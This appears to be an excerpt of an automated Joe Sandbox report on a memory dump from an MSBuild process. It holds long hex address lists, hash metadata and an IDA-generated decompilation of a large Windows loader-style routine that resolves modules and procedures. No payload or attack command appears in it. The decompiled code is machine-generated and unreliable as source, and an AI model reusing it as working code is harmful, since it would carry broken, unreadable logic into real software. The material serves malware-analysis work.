                                            0x01075944
                                            0x01075949
                                            0x0107594e
                                            0x0107594e
                                            0x01075953
                                            0x0107595b
                                            0x01075976
                                            0x01075976
                                            0x0107597a
                                            0x0107597f
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x01075981
                                            0x01075981
                                            0x01075981
                                            0x01075983
                                            0x01075988
                                            0x0107598d
                                            0x01075991
                                            0x01075991
                                            0x00000000
                                            0x0107595d
                                            0x0107595d
                                            0x01075963
                                            0x01075965
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x01075967
                                            0x01075967
                                            0x0107596b
                                            0x0107596d
                                            0x00000000
                                            0x00000000
                                            0x0107596f
                                            0x01075971
                                            0x01075971
                                            0x01075974
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x01075974
                                            0x00000000
                                            0x01075967
                                            0x0107595b
                                            0x01075942
                                            0x01075863
                                            0x01032143
                                            0x01032143
                                            0x01032149
                                            0x0103214f
                                            0x010322f1
                                            0x010322f6
                                            0x00000000
                                            0x01032173
                                            0x01032173
                                            0x0103217d
                                            0x01032181
                                            0x01032186
                                            0x010759ae
                                            0x010759b2
                                            0x010759b5
                                            0x010759b7
                                            0x010759ba
                                            0x010759cd
                                            0x010759d1
                                            0x010759d5
                                            0x010759d9
                                            0x010759db
                                            0x00000000
                                            0x00000000
                                            0x010759dd
                                            0x010759dd
                                            0x010759e1
                                            0x010759e4
                                            0x010759e7
                                            0x010759ee
                                            0x010759ee
                                            0x010759f3
                                            0x010759f3
                                            0x00000000
                                            0x01032186
                                            0x0103214f
                                            0x01032106
                                            0x01032266
                                            0x010320d8
                                            0x010320da
                                            0x010320e0
                                            0x00000000
                                            0x00000000
                                            0x00000000

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b126f431b4719927e63065ed2a21b1ad34aa01db00fb03478ec67cdeb67708b6
                                            • Instruction ID: 5163875966a915482b8712ea2df0b0698d669a71fe818a128d6a841a9a7700b6
                                            • Opcode Fuzzy Hash: b126f431b4719927e63065ed2a21b1ad34aa01db00fb03478ec67cdeb67708b6
                                            • Instruction Fuzzy Hash: 57F11431A08341AFE766CF2CC9407AE7BE9AFD5324F0485ADE9D59B281D735D840CB86
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 87%
                                            			E0101D5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
                                            				signed int _v8;
                                            				intOrPtr _v20;
                                            				signed int _v36;
                                            				intOrPtr* _v40;
                                            				signed int _v44;
                                            				signed int _v48;
                                            				signed char _v52;
                                            				signed int _v60;
                                            				signed int _v64;
                                            				signed int _v68;
                                            				signed int _v72;
                                            				signed int _v76;
                                            				intOrPtr _v80;
                                            				signed int _v84;
                                            				intOrPtr _v100;
                                            				intOrPtr _v104;
                                            				signed int _v108;
                                            				signed int _v112;
                                            				signed int _v116;
                                            				intOrPtr _v120;
                                            				signed int _v132;
                                            				char _v140;
                                            				char _v144;
                                            				char _v157;
                                            				signed int _v164;
                                            				signed int _v168;
                                            				signed int _v169;
                                            				intOrPtr _v176;
                                            				signed int _v180;
                                            				signed int _v184;
                                            				intOrPtr _v188;
                                            				signed int _v192;
                                            				signed int _v200;
                                            				signed int _v208;
                                            				intOrPtr* _v212;
                                            				char _v216;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				void* __ebp;
                                            				signed int _t204;
                                            				void* _t208;
                                            				signed int _t211;
                                            				signed int _t216;
                                            				intOrPtr _t217;
                                            				intOrPtr* _t218;
                                            				signed int _t226;
                                            				signed int _t239;
                                            				signed int* _t247;
                                            				signed int _t249;
                                            				void* _t252;
                                            				signed int _t256;
                                            				signed int _t269;
                                            				signed int _t271;
                                            				signed int _t277;
                                            				signed int _t279;
                                            				intOrPtr _t283;
                                            				signed int _t287;
                                            				signed int _t288;
                                            				void* _t289;
                                            				signed char _t290;
                                            				signed int _t292;
                                            				signed int* _t293;
                                            				signed int _t306;
                                            				signed int _t307;
                                            				signed int _t308;
                                            				signed int _t309;
                                            				signed int _t310;
                                            				intOrPtr _t311;
                                            				intOrPtr _t312;
                                            				signed int _t319;
                                            				signed int _t320;
                                            				signed int* _t324;
                                            				signed int _t337;
                                            				signed int _t338;
                                            				signed int _t339;
                                            				signed int* _t340;
                                            				void* _t341;
                                            				signed int _t344;
                                            				signed int _t348;
                                            				signed int _t349;
                                            				signed int _t351;
                                            				intOrPtr _t353;
                                            				void* _t354;
                                            				signed int _t356;
                                            				signed int _t358;
                                            				intOrPtr _t359;
                                            				signed int _t363;
                                            				signed short* _t365;
                                            				void* _t367;
                                            				intOrPtr _t369;
                                            				void* _t370;
                                            				signed int _t371;
                                            				signed int _t372;
                                            				void* _t374;
                                            				signed int _t376;
                                            				void* _t384;
                                            				signed int _t387;
                                            
                                            				_v8 =  *0x10fd360 ^ _t376;
                                            				_t2 =  &_a20;
                                            				 *_t2 = _a20 & 0x00000001;
                                            				_t287 = _a4;
                                            				_v200 = _a12;
                                            				_t365 = _a8;
                                            				_v212 = _a16;
                                            				_v180 = _a24;
                                            				_v168 = 0;
                                            				_v157 = 0;
                                            				if( *_t2 != 0) {
                                            					__eflags = E01016600(0x10f52d8);
                                            					if(__eflags == 0) {
                                            						goto L1;
                                            					} else {
                                            						_v188 = 6;
                                            					}
                                            				} else {
                                            					L1:
                                            					_v188 = 9;
                                            				}
                                            				if(_t365 == 0) {
                                            					_v164 = 0;
                                            					goto L5;
                                            				} else {
                                            					_t363 =  *_t365 & 0x0000ffff;
                                            					_t341 = _t363 + 1;
                                            					if((_t365[1] & 0x0000ffff) < _t341) {
                                            						L109:
                                            						__eflags = _t341 - 0x80;
                                            						if(_t341 <= 0x80) {
                                            							_t281 =  &_v140;
                                            							_v164 =  &_v140;
                                            							goto L114;
                                            						} else {
                                            							_t283 =  *0x10f7b9c; // 0x0
                                            							_t281 = L01024620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
                                            							_v164 = _t281;
                                            							__eflags = _t281;
                                            							if(_t281 != 0) {
                                            								_v157 = 1;
                                            								L114:
                                            								E0104F3E0(_t281, _t365[2], _t363);
                                            								_t200 = _v164;
                                            								 *((char*)(_v164 + _t363)) = 0;
                                            								goto L5;
                                            							} else {
                                            								_t204 = 0xc000009a;
                                            								goto L47;
                                            							}
                                            						}
                                            					} else {
                                            						_t200 = _t365[2];
                                            						_v164 = _t200;
                                            						if( *((char*)(_t200 + _t363)) != 0) {
                                            							goto L109;
                                            						} else {
                                            							while(1) {
                                            								L5:
                                            								_t353 = 0;
                                            								_t342 = 0x1000;
                                            								_v176 = 0;
                                            								if(_t287 == 0) {
                                            									break;
                                            								}
                                            								_t384 = _t287 -  *0x10f7b90; // 0x77090000
                                            								if(_t384 == 0) {
                                            									_t353 =  *0x10f7b8c; // 0xac2af0
                                            									_v176 = _t353;
                                            									_t320 = ( *(_t353 + 0x50))[8];
                                            									_v184 = _t320;
                                            								} else {
                                            									E01022280(_t200, 0x10f84d8);
                                            									_t277 =  *0x10f85f4; // 0xac2fe0
                                            									_t351 =  *0x10f85f8 & 1;
                                            									while(_t277 != 0) {
                                            										_t337 =  *(_t277 - 0x50);
                                            										if(_t337 > _t287) {
                                            											_t338 = _t337 | 0xffffffff;
                                            										} else {
                                            											asm("sbb ecx, ecx");
                                            											_t338 =  ~_t337;
                                            										}
                                            										_t387 = _t338;
                                            										if(_t387 < 0) {
                                            											_t339 =  *_t277;
                                            											__eflags = _t351;
                                            											if(_t351 != 0) {
                                            												__eflags = _t339;
                                            												if(_t339 == 0) {
                                            													goto L16;
                                            												} else {
                                            													goto L118;
                                            												}
                                            												goto L151;
                                            											} else {
                                            												goto L16;
                                            											}
                                            											goto L17;
                                            										} else {
                                            											if(_t387 <= 0) {
                                            												__eflags = _t277;
                                            												if(_t277 != 0) {
                                            													_t340 =  *(_t277 - 0x18);
                                            													_t24 = _t277 - 0x68; // 0xac2f78
                                            													_t353 = _t24;
                                            													_v176 = _t353;
                                            													__eflags = _t340[3] - 0xffffffff;
                                            													if(_t340[3] != 0xffffffff) {
                                            														_t279 =  *_t340;
                                            														__eflags =  *(_t279 - 0x20) & 0x00000020;
                                            														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
                                            															asm("lock inc dword [edi+0x9c]");
                                            															_t340 =  *(_t353 + 0x50);
                                            														}
                                            													}
                                            													_v184 = _t340[8];
                                            												}
                                            											} else {
                                            												_t339 =  *(_t277 + 4);
                                            												if(_t351 != 0) {
                                            													__eflags = _t339;
                                            													if(_t339 == 0) {
                                            														goto L16;
                                            													} else {
                                            														L118:
                                            														_t277 = _t277 ^ _t339;
                                            														goto L17;
                                            													}
                                            													goto L151;
                                            												} else {
                                            													L16:
                                            													_t277 = _t339;
                                            												}
                                            												goto L17;
                                            											}
                                            										}
                                            										goto L25;
                                            										L17:
                                            									}
                                            									L25:
                                            									E0101FFB0(_t287, _t353, 0x10f84d8);
                                            									_t320 = _v184;
                                            									_t342 = 0x1000;
                                            								}
                                            								if(_t353 == 0) {
                                            									break;
                                            								} else {
                                            									_t366 = 0;
                                            									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
                                            										_t288 = _v164;
                                            										if(_t353 != 0) {
                                            											_t342 = _t288;
                                            											_t374 = E0105CC99(_t353, _t288, _v200, 1,  &_v168);
                                            											if(_t374 >= 0) {
                                            												if(_v184 == 7) {
                                            													__eflags = _a20;
                                            													if(__eflags == 0) {
                                            														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
                                            														if(__eflags != 0) {
                                            															_t271 = E01016600(0x10f52d8);
                                            															__eflags = _t271;
                                            															if(__eflags == 0) {
                                            																_t342 = 0;
                                            																_v169 = _t271;
                                            																_t374 = E01017926( *(_t353 + 0x50), 0,  &_v169);
                                            															}
                                            														}
                                            													}
                                            												}
                                            												if(_t374 < 0) {
                                            													_v168 = 0;
                                            												} else {
                                            													if( *0x10fb239 != 0) {
                                            														_t342 =  *(_t353 + 0x18);
                                            														E0108E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
                                            													}
                                            													if( *0x10f8472 != 0) {
                                            														_v192 = 0;
                                            														_t342 =  *0x7ffe0330;
                                            														asm("ror edi, cl");
                                            														 *0x10fb1e0( &_v192, _t353, _v168, 0, _v180);
                                            														 *( *0x10fb218 ^  *0x7ffe0330)();
                                            														_t269 = _v192;
                                            														_t353 = _v176;
                                            														__eflags = _t269;
                                            														if(__eflags != 0) {
                                            															_v168 = _t269;
                                            														}
                                            													}
                                            												}
                                            											}
                                            											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
                                            												_t366 = 0xc000007a;
                                            											}
                                            											_t247 =  *(_t353 + 0x50);
                                            											if(_t247[3] == 0xffffffff) {
                                            												L40:
                                            												if(_t366 == 0xc000007a) {
                                            													__eflags = _t288;
                                            													if(_t288 == 0) {
                                            														goto L136;
                                            													} else {
                                            														_t366 = 0xc0000139;
                                            													}
                                            													goto L54;
                                            												}
                                            											} else {
                                            												_t249 =  *_t247;
                                            												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
                                            													goto L40;
                                            												} else {
                                            													_t250 = _t249 | 0xffffffff;
                                            													asm("lock xadd [edi+0x9c], eax");
                                            													if((_t249 | 0xffffffff) == 0) {
                                            														E01022280(_t250, 0x10f84d8);
                                            														_t342 =  *(_t353 + 0x54);
                                            														_t165 = _t353 + 0x54; // 0x54
                                            														_t252 = _t165;
                                            														__eflags =  *(_t342 + 4) - _t252;
                                            														if( *(_t342 + 4) != _t252) {
                                            															L135:
                                            															asm("int 0x29");
                                            															L136:
                                            															_t288 = _v200;
                                            															_t366 = 0xc0000138;
                                            															L54:
                                            															_t342 = _t288;
                                            															L01043898(0, _t288, _t366);
                                            														} else {
                                            															_t324 =  *(_t252 + 4);
                                            															__eflags =  *_t324 - _t252;
                                            															if( *_t324 != _t252) {
                                            																goto L135;
                                            															} else {
                                            																 *_t324 = _t342;
                                            																 *(_t342 + 4) = _t324;
                                            																_t293 =  *(_t353 + 0x50);
                                            																_v180 =  *_t293;
                                            																E0101FFB0(_t293, _t353, 0x10f84d8);
                                            																__eflags =  *((short*)(_t353 + 0x3a));
                                            																if( *((short*)(_t353 + 0x3a)) != 0) {
                                            																	_t342 = 0;
                                            																	__eflags = 0;
                                            																	E010437F5(_t353, 0);
                                            																}
                                            																E01040413(_t353);
                                            																_t256 =  *(_t353 + 0x48);
                                            																__eflags = _t256;
                                            																if(_t256 != 0) {
                                            																	__eflags = _t256 - 0xffffffff;
                                            																	if(_t256 != 0xffffffff) {
                                            																		E01039B10(_t256);
                                            																	}
                                            																}
                                            																__eflags =  *(_t353 + 0x28);
                                            																if( *(_t353 + 0x28) != 0) {
                                            																	_t174 = _t353 + 0x24; // 0x24
                                            																	E010302D6(_t174);
                                            																}
                                            																L010277F0( *0x10f7b98, 0, _t353);
                                            																__eflags = _v180 - _t293;
                                            																if(__eflags == 0) {
                                            																	E0103C277(_t293, _t366);
                                            																}
                                            																_t288 = _v164;
                                            																goto L40;
                                            															}
                                            														}
                                            													} else {
                                            														goto L40;
                                            													}
                                            												}
                                            											}
                                            										}
                                            									} else {
                                            										L0101EC7F(_t353);
                                            										L010319B8(_t287, 0, _t353, 0);
                                            										_t200 = E0100F4E3(__eflags);
                                            										continue;
                                            									}
                                            								}
                                            								L41:
                                            								if(_v157 != 0) {
                                            									L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
                                            								}
                                            								if(_t366 < 0 || ( *0x10fb2f8 |  *0x10fb2fc) == 0 || ( *0x10fb2e4 & 0x00000001) != 0) {
                                            									L46:
                                            									 *_v212 = _v168;
                                            									_t204 = _t366;
                                            									L47:
                                            									_pop(_t354);
                                            									_pop(_t367);
                                            									_pop(_t289);
                                            									return E0104B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
                                            								} else {
                                            									_v200 = 0;
                                            									if(( *0x10fb2ec >> 0x00000008 & 0x00000003) == 3) {
                                            										_t355 = _v168;
                                            										_t342 =  &_v208;
                                            										_t208 = E010B6B68(_v168,  &_v208, _v168, __eflags);
                                            										__eflags = _t208 - 1;
                                            										if(_t208 == 1) {
                                            											goto L46;
                                            										} else {
                                            											__eflags = _v208 & 0x00000010;
                                            											if((_v208 & 0x00000010) == 0) {
                                            												goto L46;
                                            											} else {
                                            												_t342 = 4;
                                            												_t366 = E010B6AEB(_t355, 4,  &_v216);
                                            												__eflags = _t366;
                                            												if(_t366 >= 0) {
                                            													goto L46;
                                            												} else {
                                            													asm("int 0x29");
                                            													_t356 = 0;
                                            													_v44 = 0;
                                            													_t290 = _v52;
                                            													__eflags = 0;
                                            													if(0 == 0) {
                                            														L108:
                                            														_t356 = 0;
                                            														_v44 = 0;
                                            														goto L63;
                                            													} else {
                                            														__eflags = 0;
                                            														if(0 < 0) {
                                            															goto L108;
                                            														}
                                            														L63:
                                            														_v112 = _t356;
                                            														__eflags = _t356;
                                            														if(_t356 == 0) {
                                            															L143:
                                            															_v8 = 0xfffffffe;
                                            															_t211 = 0xc0000089;
                                            														} else {
                                            															_v36 = 0;
                                            															_v60 = 0;
                                            															_v48 = 0;
                                            															_v68 = 0;
                                            															_v44 = _t290 & 0xfffffffc;
                                            															E0101E9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
                                            															_t306 = _v68;
                                            															__eflags = _t306;
                                            															if(_t306 == 0) {
                                            																_t216 = 0xc000007b;
                                            																_v36 = 0xc000007b;
                                            																_t307 = _v60;
                                            															} else {
                                            																__eflags = _t290 & 0x00000001;
                                            																if(__eflags == 0) {
                                            																	_t349 =  *(_t306 + 0x18) & 0x0000ffff;
                                            																	__eflags = _t349 - 0x10b;
                                            																	if(_t349 != 0x10b) {
                                            																		__eflags = _t349 - 0x20b;
                                            																		if(_t349 == 0x20b) {
                                            																			goto L102;
                                            																		} else {
                                            																			_t307 = 0;
                                            																			_v48 = 0;
                                            																			_t216 = 0xc000007b;
                                            																			_v36 = 0xc000007b;
                                            																			goto L71;
                                            																		}
                                            																	} else {
                                            																		L102:
                                            																		_t307 =  *(_t306 + 0x50);
                                            																		goto L69;
                                            																	}
                                            																	goto L151;
                                            																} else {
                                            																	_t239 = L0101EAEA(_t290, _t290, _t356, _t366, __eflags);
                                            																	_t307 = _t239;
                                            																	_v60 = _t307;
                                            																	_v48 = _t307;
                                            																	__eflags = _t307;
                                            																	if(_t307 != 0) {
                                            																		L70:
                                            																		_t216 = _v36;
                                            																	} else {
                                            																		_push(_t239);
                                            																		_push(0x14);
                                            																		_push( &_v144);
                                            																		_push(3);
                                            																		_push(_v44);
                                            																		_push(0xffffffff);
                                            																		_t319 = E01049730();
                                            																		_v36 = _t319;
                                            																		__eflags = _t319;
                                            																		if(_t319 < 0) {
                                            																			_t216 = 0xc000001f;
                                            																			_v36 = 0xc000001f;
                                            																			_t307 = _v60;
                                            																		} else {
                                            																			_t307 = _v132;
                                            																			L69:
                                            																			_v48 = _t307;
                                            																			goto L70;
                                            																		}
                                            																	}
                                            																}
                                            															}
                                            															L71:
                                            															_v72 = _t307;
                                            															_v84 = _t216;
                                            															__eflags = _t216 - 0xc000007b;
                                            															if(_t216 == 0xc000007b) {
                                            																L150:
                                            																_v8 = 0xfffffffe;
                                            																_t211 = 0xc000007b;
                                            															} else {
                                            																_t344 = _t290 & 0xfffffffc;
                                            																_v76 = _t344;
                                            																__eflags = _v40 - _t344;
                                            																if(_v40 <= _t344) {
                                            																	goto L150;
                                            																} else {
                                            																	__eflags = _t307;
                                            																	if(_t307 == 0) {
                                            																		L75:
                                            																		_t217 = 0;
                                            																		_v104 = 0;
                                            																		__eflags = _t366;
                                            																		if(_t366 != 0) {
                                            																			__eflags = _t290 & 0x00000001;
                                            																			if((_t290 & 0x00000001) != 0) {
                                            																				_t217 = 1;
                                            																				_v104 = 1;
                                            																			}
                                            																			_t290 = _v44;
                                            																			_v52 = _t290;
                                            																		}
                                            																		__eflags = _t217 - 1;
                                            																		if(_t217 != 1) {
                                            																			_t369 = 0;
                                            																			_t218 = _v40;
                                            																			goto L91;
                                            																		} else {
                                            																			_v64 = 0;
                                            																			E0101E9C0(1, _t290, 0, 0,  &_v64);
                                            																			_t309 = _v64;
                                            																			_v108 = _t309;
                                            																			__eflags = _t309;
                                            																			if(_t309 == 0) {
                                            																				goto L143;
                                            																			} else {
                                            																				_t226 =  *(_t309 + 0x18) & 0x0000ffff;
                                            																				__eflags = _t226 - 0x10b;
                                            																				if(_t226 != 0x10b) {
                                            																					__eflags = _t226 - 0x20b;
                                            																					if(_t226 != 0x20b) {
                                            																						goto L143;
                                            																					} else {
                                            																						_t371 =  *(_t309 + 0x98);
                                            																						goto L83;
                                            																					}
                                            																				} else {
                                            																					_t371 =  *(_t309 + 0x88);
                                            																					L83:
                                            																					__eflags = _t371;
                                            																					if(_t371 != 0) {
                                            																						_v80 = _t371 - _t356 + _t290;
                                            																						_t310 = _v64;
                                            																						_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
                                            																						_t292 =  *(_t310 + 6) & 0x0000ffff;
                                            																						_t311 = 0;
                                            																						__eflags = 0;
                                            																						while(1) {
                                            																							_v120 = _t311;
                                            																							_v116 = _t348;
                                            																							__eflags = _t311 - _t292;
                                            																							if(_t311 >= _t292) {
                                            																								goto L143;
                                            																							}
                                            																							_t359 =  *((intOrPtr*)(_t348 + 0xc));
                                            																							__eflags = _t371 - _t359;
                                            																							if(_t371 < _t359) {
                                            																								L98:
                                            																								_t348 = _t348 + 0x28;
                                            																								_t311 = _t311 + 1;
                                            																								continue;
                                            																							} else {
                                            																								__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
                                            																								if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
                                            																									goto L98;
                                            																								} else {
                                            																									__eflags = _t348;
                                            																									if(_t348 == 0) {
                                            																										goto L143;
                                            																									} else {
                                            																										_t218 = _v40;
                                            																										_t312 =  *_t218;
                                            																										__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
                                            																										if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
                                            																											_v100 = _t359;
                                            																											_t360 = _v108;
                                            																											_t372 = L01018F44(_v108, _t312);
                                            																											__eflags = _t372;
                                            																											if(_t372 == 0) {
                                            																												goto L143;
                                            																											} else {
                                            																												_t290 = _v52;
                                            																												_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E01043C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
                                            																												_t307 = _v72;
                                            																												_t344 = _v76;
                                            																												_t218 = _v40;
                                            																												goto L91;
                                            																											}
                                            																										} else {
                                            																											_t290 = _v52;
                                            																											_t307 = _v72;
                                            																											_t344 = _v76;
                                            																											_t369 = _v80;
                                            																											L91:
                                            																											_t358 = _a4;
                                            																											__eflags = _t358;
                                            																											if(_t358 == 0) {
                                            																												L95:
                                            																												_t308 = _a8;
                                            																												__eflags = _t308;
                                            																												if(_t308 != 0) {
                                            																													 *_t308 =  *((intOrPtr*)(_v40 + 4));
                                            																												}
                                            																												_v8 = 0xfffffffe;
                                            																												_t211 = _v84;
                                            																											} else {
                                            																												_t370 =  *_t218 - _t369 + _t290;
                                            																												 *_t358 = _t370;
                                            																												__eflags = _t370 - _t344;
                                            																												if(_t370 <= _t344) {
                                            																													L149:
                                            																													 *_t358 = 0;
                                            																													goto L150;
                                            																												} else {
                                            																													__eflags = _t307;
                                            																													if(_t307 == 0) {
                                            																														goto L95;
                                            																													} else {
                                            																														__eflags = _t370 - _t344 + _t307;
                                            																														if(_t370 >= _t344 + _t307) {
                                            																															goto L149;
                                            																														} else {
                                            																															goto L95;
                                            																														}
                                            																													}
                                            																												}
                                            																											}
                                            																										}
                                            																									}
                                            																								}
                                            																							}
                                            																							goto L97;
                                            																						}
                                            																					}
                                            																					goto L143;
                                            																				}
                                            																			}
                                            																		}
                                            																	} else {
                                            																		__eflags = _v40 - _t307 + _t344;
                                            																		if(_v40 >= _t307 + _t344) {
                                            																			goto L150;
                                            																		} else {
                                            																			goto L75;
                                            																		}
                                            																	}
                                            																}
                                            															}
                                            														}
                                            														L97:
                                            														 *[fs:0x0] = _v20;
                                            														return _t211;
                                            													}
                                            												}
                                            											}
                                            										}
                                            									} else {
                                            										goto L46;
                                            									}
                                            								}
                                            								goto L151;
                                            							}
                                            							_t288 = _v164;
                                            							_t366 = 0xc0000135;
                                            							goto L41;
                                            						}
                                            					}
                                            				}
                                            				L151:
                                            			}





































































































                                            0x0101d5f2
                                            0x0101d5f5
                                            0x0101d5f5
                                            0x0101d5fd
                                            0x0101d600
                                            0x0101d60a
                                            0x0101d60d
                                            0x0101d617
                                            0x0101d61d
                                            0x0101d627
                                            0x0101d62e
                                            0x0101d911
                                            0x0101d913
                                            0x00000000
                                            0x0101d919
                                            0x0101d919
                                            0x0101d919
                                            0x0101d634
                                            0x0101d634
                                            0x0101d634
                                            0x0101d634
                                            0x0101d640
                                            0x0101d8bf
                                            0x00000000
                                            0x0101d646
                                            0x0101d646
                                            0x0101d64d
                                            0x0101d652
                                            0x0106b2fc
                                            0x0106b2fc
                                            0x0106b302
                                            0x0106b33b
                                            0x0106b341
                                            0x00000000
                                            0x0106b304
                                            0x0106b304
                                            0x0106b319
                                            0x0106b31e
                                            0x0106b324
                                            0x0106b326
                                            0x0106b332
                                            0x0106b347
                                            0x0106b34c
                                            0x0106b351
                                            0x0106b35a
                                            0x00000000
                                            0x0106b328
                                            0x0106b328
                                            0x00000000
                                            0x0106b328
                                            0x0106b326
                                            0x0101d658
                                            0x0101d658
                                            0x0101d65b
                                            0x0101d665
                                            0x00000000
                                            0x0101d66b
                                            0x0101d66b
                                            0x0101d66b
                                            0x0101d66b
                                            0x0101d66d
                                            0x0101d672
                                            0x0101d67a
                                            0x00000000
                                            0x00000000
                                            0x0101d680
                                            0x0101d686
                                            0x0101d8ce
                                            0x0101d8d4
                                            0x0101d8dd
                                            0x0101d8e0
                                            0x0101d68c
                                            0x0101d691
                                            0x0101d69d
                                            0x0101d6a2
                                            0x0101d6a7
                                            0x0101d6b0
                                            0x0101d6b5
                                            0x0101d6e0
                                            0x0101d6b7
                                            0x0101d6b7
                                            0x0101d6b9
                                            0x0101d6b9
                                            0x0101d6bb
                                            0x0101d6bd
                                            0x0101d6ce
                                            0x0101d6d0
                                            0x0101d6d2
                                            0x0106b363
                                            0x0106b365
                                            0x00000000
                                            0x0106b36b
                                            0x00000000
                                            0x0106b36b
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0101d6bf
                                            0x0101d6bf
                                            0x0101d6e5
                                            0x0101d6e7
                                            0x0101d6e9
                                            0x0101d6ec
                                            0x0101d6ec
                                            0x0101d6ef
                                            0x0101d6f5
                                            0x0101d6f9
                                            0x0101d6fb
                                            0x0101d6fd
                                            0x0101d701
                                            0x0101d703
                                            0x0101d70a
                                            0x0101d70a
                                            0x0101d701
                                            0x0101d710
                                            0x0101d710
                                            0x0101d6c1
                                            0x0101d6c1
                                            0x0101d6c6
                                            0x0106b36d
                                            0x0106b36f
                                            0x00000000
                                            0x0106b375
                                            0x0106b375
                                            0x0106b375
                                            0x00000000
                                            0x0106b375
                                            0x00000000
                                            0x0101d6cc
                                            0x0101d6d8
                                            0x0101d6d8
                                            0x0101d6d8
                                            0x00000000
                                            0x0101d6c6
                                            0x0101d6bf
                                            0x00000000
                                            0x0101d6da
                                            0x0101d6da
                                            0x0101d716
                                            0x0101d71b
                                            0x0101d720
                                            0x0101d726
                                            0x0101d726
                                            0x0101d72d
                                            0x00000000
                                            0x0101d733
                                            0x0101d739
                                            0x0101d742
                                            0x0101d750
                                            0x0101d758
                                            0x0101d764
                                            0x0101d776
                                            0x0101d77a
                                            0x0101d783
                                            0x0101d928
                                            0x0101d92c
                                            0x0101d93d
                                            0x0101d944
                                            0x0101d94f
                                            0x0101d954
                                            0x0101d956
                                            0x0101d95f
                                            0x0101d961
                                            0x0101d973
                                            0x0101d973
                                            0x0101d956
                                            0x0101d944
                                            0x0101d92c
                                            0x0101d78b
                                            0x0106b394
                                            0x0101d791
                                            0x0101d798
                                            0x0106b3a3
                                            0x0106b3bb
                                            0x0106b3bb
                                            0x0101d7a5
                                            0x0101d866
                                            0x0101d870
                                            0x0101d892
                                            0x0101d898
                                            0x0101d89e
                                            0x0101d8a0
                                            0x0101d8a6
                                            0x0101d8ac
                                            0x0101d8ae
                                            0x0101d8b4
                                            0x0101d8b4
                                            0x0101d8ae
                                            0x0101d7a5
                                            0x0101d78b
                                            0x0101d7b1
                                            0x0106b3c5
                                            0x0106b3c5
                                            0x0101d7c3
                                            0x0101d7ca
                                            0x0101d7e5
                                            0x0101d7eb
                                            0x0101d8eb
                                            0x0101d8ed
                                            0x00000000
                                            0x0101d8f3
                                            0x0101d8f3
                                            0x0101d8f3
                                            0x00000000
                                            0x0101d8ed
                                            0x0101d7cc
                                            0x0101d7cc
                                            0x0101d7d2
                                            0x00000000
                                            0x0101d7d4
                                            0x0101d7d4
                                            0x0101d7d7
                                            0x0101d7df
                                            0x0106b3d4
                                            0x0106b3d9
                                            0x0106b3dc
                                            0x0106b3dc
                                            0x0106b3df
                                            0x0106b3e2
                                            0x0106b468
                                            0x0106b46d
                                            0x0106b46f
                                            0x0106b46f
                                            0x0106b475
                                            0x0101d8f8
                                            0x0101d8f9
                                            0x0101d8fd
                                            0x0106b3e8
                                            0x0106b3e8
                                            0x0106b3eb
                                            0x0106b3ed
                                            0x00000000
                                            0x0106b3ef
                                            0x0106b3ef
                                            0x0106b3f1
                                            0x0106b3f4
                                            0x0106b3fe
                                            0x0106b404
                                            0x0106b409
                                            0x0106b40e
                                            0x0106b410
                                            0x0106b410
                                            0x0106b414
                                            0x0106b414
                                            0x0106b41b
                                            0x0106b420
                                            0x0106b423
                                            0x0106b425
                                            0x0106b427
                                            0x0106b42a
                                            0x0106b42d
                                            0x0106b42d
                                            0x0106b42a
                                            0x0106b432
                                            0x0106b436
                                            0x0106b438
                                            0x0106b43b
                                            0x0106b43b
                                            0x0106b449
                                            0x0106b44e
                                            0x0106b454
                                            0x0106b458
                                            0x0106b458
                                            0x0106b45d
                                            0x00000000
                                            0x0106b45d
                                            0x0106b3ed
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0101d7df
                                            0x0101d7d2
                                            0x0101d7ca
                                            0x0106b37c
                                            0x0106b37e
                                            0x0106b385
                                            0x0106b38a
                                            0x00000000
                                            0x0106b38a
                                            0x0101d742
                                            0x0101d7f1
                                            0x0101d7f8
                                            0x0106b49b
                                            0x0106b49b
                                            0x0101d800
                                            0x0101d837
                                            0x0101d843
                                            0x0101d845
                                            0x0101d847
                                            0x0101d84a
                                            0x0101d84b
                                            0x0101d84e
                                            0x0101d857
                                            0x0101d818
                                            0x0101d824
                                            0x0101d831
                                            0x0106b4a5
                                            0x0106b4ab
                                            0x0106b4b3
                                            0x0106b4b8
                                            0x0106b4bb
                                            0x00000000
                                            0x0106b4c1
                                            0x0106b4c1
                                            0x0106b4c8
                                            0x00000000
                                            0x0106b4ce
                                            0x0106b4d4
                                            0x0106b4e1
                                            0x0106b4e3
                                            0x0106b4e5
                                            0x00000000
